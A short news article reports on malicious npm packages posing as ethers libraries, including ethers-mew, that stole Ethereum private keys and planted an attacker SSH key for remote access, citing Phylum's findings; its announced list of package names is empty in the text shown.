Malicious npm Packages Target Ethereum Wallets with SSH Backdoor

SeniorTechInfo
2 Min Read

Cybersecurity researchers have uncovered suspicious packages on the npm registry designed to steal Ethereum private keys and gain remote access via SSH.

The packages attempt to gain SSH access by adding the attacker’s key to the authorized_keys file on the victim’s machine, as revealed by Phylum.

The list of fake ethers packages involved in this campaign includes:

Some of these packages, mostly published by accounts like “crstianokavic” and “timyorks,” seem to be for testing purposes. The most advanced package in the list is ethers-mew.

In a similar incident from August 2023, Phylum exposed a package called ethereum-cryptographyy that stole private keys using a malicious dependency.

This new attack campaign embeds malicious code directly into the packages, allowing threat actors to extract Ethereum private keys to a domain under their control.

Unlike previous attacks that were triggered upon installing the package, this campaign requires developers to use the package’s functionality in their code, making it more deceptive.

The ethers-mew package can even modify the authorized_keys file to grant attackers persistent access to compromised hosts.

All packages and author accounts were quickly removed after a short period, as noted by Phylum.

Enjoyed this article? Follow us on Twitter and LinkedIn for more exclusive content.

Share This Article
Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *